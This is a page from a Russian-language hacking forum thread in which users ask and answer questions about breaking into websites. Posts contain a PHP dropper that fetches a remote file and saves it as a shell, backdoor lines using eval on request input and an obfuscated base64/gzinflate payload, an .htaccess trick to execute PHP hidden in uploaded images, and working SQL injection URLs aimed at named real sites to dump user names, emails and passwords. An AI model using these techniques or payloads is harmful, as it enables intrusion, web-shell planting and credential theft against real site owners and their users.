Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    попробуй просто concat
     
  2. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    309
    Likes Received:
    170
    Reputations:
    12
    Проблема с заливкой шелла на vb.
    Всё делаю как надо, ajax.php выдает всё ок, но когда захожу по пути где должен быть шелл, его там не оказывается, а просто открывается главная стр. сайта. либо 404 (зависит от сайта)

    Код:
    Code:
    $linky="http://ololo.com/papka/ld.txt";
    $saved="./name.php";
    $from=fopen("$linky","r");
    $to=fopen("$saved","w");
    while(!feof($from)){
    $string=fgets($from,4096);
    fputs($to,$string);
    }
    fclose($to);
    echo 'done';
    fclose($from);
    Возможно проблема в том, что обнаружил в плагинах кого то до меня.
    2 плагина с такими кодами:

    Code:
    eval($_REQUEST[cmd123]);
    и
    Code:
    eval(gzinflate(base64_decode("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")));  
    Плагины удалил, не помогло. Можно ли это исправить?

    модераторам: Прошу до завтрашнего вечера не удалять
     
    #18162 Fooog, 29 Oct 2011
    Last edited: 29 Oct 2011
  3. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    http://forum.antichat.ru/showpost.php?p=2878106&postcount=18342
    http://forum.antichat.ru/showpost.php?p=2878121&postcount=18344
    http://forum.antichat.ru/showpost.php?p=2878125&postcount=18345
     
  4. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    309
    Likes Received:
    170
    Reputations:
    12
    Boolean, в таком случае ajax.php должен был выбить ошибку, а не то что всё ок.
    Я тоже думал что мб это в этом проблема, но проверил кучу папок, а результат тот же.
     
  5. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Он выкинет если разрешено.
    error_reporting(E_ALL);
    ini_set('display_errors', '1');
     
  6. evge_mir

    evge_mir New Member

    Joined:
    2 Mar 2011
    Messages:
    1
    Likes Received:
    4
    Reputations:
    5
    может быть такое, что в information schema не хранятся данные для доступа (логин, пароль)?
     
  7. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Они там никогда не хранятся. Читайте мануалы.
     
  8. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    315
    Likes Received:
    63
    Reputations:
    66
    Сорри, если вопрос очень нубский.
    У меня следующего плана вопрос.
    В общем имеется скрипт, который аплоадит картинки на сервер - профильные аватарки.В картинку, которую я залил, я вставил php код, а в папке, которую аплоадятся аватарки, отсутствует .htaccess, но тем не менее скрипт не дает заливать файлы с расширением php.Можно ли каким-либо образом исполнить php код из картинки ?
    Залитая картинка полностью функциональна при этом
     
    #18168 t3cHn0iD, 29 Oct 2011
    Last edited: 29 Oct 2011
  9. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Ну если на есть LFI уязвимости, то можно проинклудить картинку.
    Не совсем понял причем тут .htaccess, когда _скрипт_ не дает заливать файлы с расширением .php.
    Он и не должен был бы препятствовать этому.
    Попробуй сам загрузить .htaccess:
    AddType application/x-httpd-php .jpg

    И позже заливать .jpg шелл.

    Или пробуй .php5 и так далее.
     
    1 person likes this.
  10. root47

    root47 New Member

    Joined:
    2 Oct 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    http://rumafia.com/news.php?id=232
    не могу вывести таблици помогите
     
  11. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Там две БД.

    http://rumafia.com/news.php?id=-232+union+select+1,2,3,4,table_schema,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+

    Вывод таблиц

    http://rumafia.com/news.php?id=-232+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+
     
  12. namez2

    namez2 New Member

    Joined:
    23 Aug 2010
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    Такая ситуация . как можно вывести данные из таблиц в сортировке с 1й записи. , а то выводиться все с 166 позиции. ???
    как то пример
    ---articles.html?id=-7'+union+select+1,2,(group_concat(id,0x3b,name,0x3b,email,0x3b,passwd)),4,5+from+база.навание_таблицы--+
     
  13. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Так выводил?

     
  14. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    ORDER BY `id` ASC
     
  15. namez2

    namez2 New Member

    Joined:
    23 Aug 2010
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    Что то не получается так

    http://goldsauna.ru/articles.html?id=7'+union+select+1,2,(select(@x)from(select(@x:=0x00,(select(0)from(goldsauna.users)where(0x00)in(@x:=concat(@x,0x3c62723e,id,0x3a,name))))x),4,5--+


    и зачем в конце x между скобками?
    ---

    ORDER BY `id` ASC -а как это подставлять перед id? или где почитать можно по этому поводу?
     
    #18175 namez2, 30 Oct 2011
    Last edited: 30 Oct 2011
  16. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    --articles.html?id=-7'+union+select+1,2,(group_concat(id,0x3b,name,0x3 b,email,0x3b,passwd)),4,5+from+база.навание_таблицы+ORDER+BY+id+ASC+--+
     
  17. namez2

    namez2 New Member

    Joined:
    23 Aug 2010
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    странно.. от подстановки ORDER+BY+id+ASC+--+
    сортировки по id нет.
     
  18. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Сортировка есть, по любому.
    N, N+1, N+2, N+3

    Не обязательно, что N = 1.
     
  19. namez2

    namez2 New Member

    Joined:
    23 Aug 2010
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    а как можно сделать чтоб было N=0
    т.е. считалось id от нуля?
     
  20. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Ну если их там нет, то откуда им взяться?
    Записи с id 1, 2,3 и т.п. вполне могли быть удалены.
     
Loading...
Thread Status:
Not open for further replies.